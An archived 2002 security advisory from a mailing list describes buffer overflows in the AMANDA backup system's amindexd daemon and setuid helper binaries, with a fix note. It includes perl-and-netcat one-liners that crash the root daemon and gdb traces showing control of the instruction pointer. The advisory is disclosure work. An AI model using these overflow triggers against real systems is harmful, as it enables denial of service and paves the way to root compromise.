[UNIX] AMANDA Security Issues

From: support@securiteam.com
Date: 05/27/02


From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 27 May 2002 18:27:00 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  AMANDA Security Issues
------------------------------------------------------------------------

SUMMARY

The Advanced Maryland Automatic Network Disk Archiver (
<http://www.amanda.org/> AMANDA) is a backup system that is available for
many different Unix-based operating systems. Several setuid and setgid
binaries that are installed by this package contain buffer overflow
vulnerabilities that can be used to execute shellcode with elevated
privileges. Additionally, the amindexd daemon contains a remote overflow
bug that can lead to a remote system compromise.

The affected version of AMANDA is an old package but is often used due to
compatibility problems with newer versions. For example, this package was
until recently shipped with the FreeBSD 4.5 ports collection.

DETAILS

Technical details:
The local overflows are all found in files that can only be executed by
those that are member of the operator group. This is a big limitation to
anyone that is trying to abuse Amanda locally as normal users are not
member of this group. The big risk here is the amindexd daemon
(10082/TCP) that runs as root and contains several overflows of which two
can be triggered without any knowledge of the affect systems
configuration.

The amindexd daemon (remote, runs as root)
Long commands send to this server will result in an immediate overflow.
This does not require any knowledge of the affect systems configuration.
Simple replication of this overflow:
perl -e 'print "A" x 260;print "BBBB";' | nc localhost 10082
perl -e 'print "DATE "; print "A" x 260;' | nc localhost 10082

The below listed file are only accessible by users that are member of the
group 'operator'. This is a big limitation for anyone that will try to
abuse it.

The amcheck file (setuid root)
bash-2.05a# /usr/local/bin/amcheck `perl -e 'print "A" x 1000'`
Segmentation fault (core dumped)

(gdb) bt
#0 0x2814c022 in ?? ()
#1 0x280f8c0a in ?? ()
#2 0x804d671 in ?? ()
#3 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)

The amgetidx file (setuid operator)
(gdb) bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx

(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amgetidx `perl -e 'print "A" x
3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28144022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28144022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280f0c0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804c8dd in getsockname ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The amtrmidx file (setuid operator)
bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx

(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e 'print "A" x
3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28141022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28141022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280edc0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804b291 in free ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The createindex-dump file (setuid operator)
sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump

(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e
'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048874 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The createindex-gnutar file (setuid operator)
bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar

(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e
'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048811 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

Fix information:
Upgrade AMANDA to the latest stable version, which is available from the
developer's web site: <http://www.amanda.org> http://www.amanda.org

As noted earlier, this affects the FreeBSD ports collection that is
shipped with 4.5 or earlier. FreeBSD was contacted and has removed the
vulnerable AMANDA port.

Thanks AMANDA developers and FreeBSD for the fast reaction on this issue.

ADDITIONAL INFORMATION

The information has been provided by <mailto:zillion@snosoft.com>
zillion.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • AMANDA security issues
    ... The Advanced Maryland Automatic Network Disk Archiver (AMANDA) is ... the amindexd daemon contains a remote overflow bug ... (no debugging symbols found)......(no ...
    (Vuln-Dev)
  • AMANDA security issues
    ... The Advanced Maryland Automatic Network Disk Archiver (AMANDA) is ... the amindexd daemon contains a remote overflow bug ... (no debugging symbols found)......(no ...
    (Bugtraq)
  • Re: RFC: jemalloc: qdbus sigsegv in malloc_init
    ... GDB is free software, covered by the GNU General Public License, and you are ... This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)... ... Breakpoint 1 pending. ... Key 3, destructor 0x0 ...
    (freebsd-current)
  • RE: stack overflow help ..
    ... GNU gdb Red Hat Linux ... Reading symbols from shared object read from target ... (no debugging symbols found)...(no debugging symbols ...
    (Security-Basics)
  • Re: XMMS or SCHED_ULE issue?
    ... Right after 'continue' in gdb, ... This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols ... Reading symbols from /usr/X11R6/lib/libXext.so.6...(no debugging symbols ... Loaded symbols for /usr/X11R6/lib/libXext.so.6 ...
    (freebsd-current)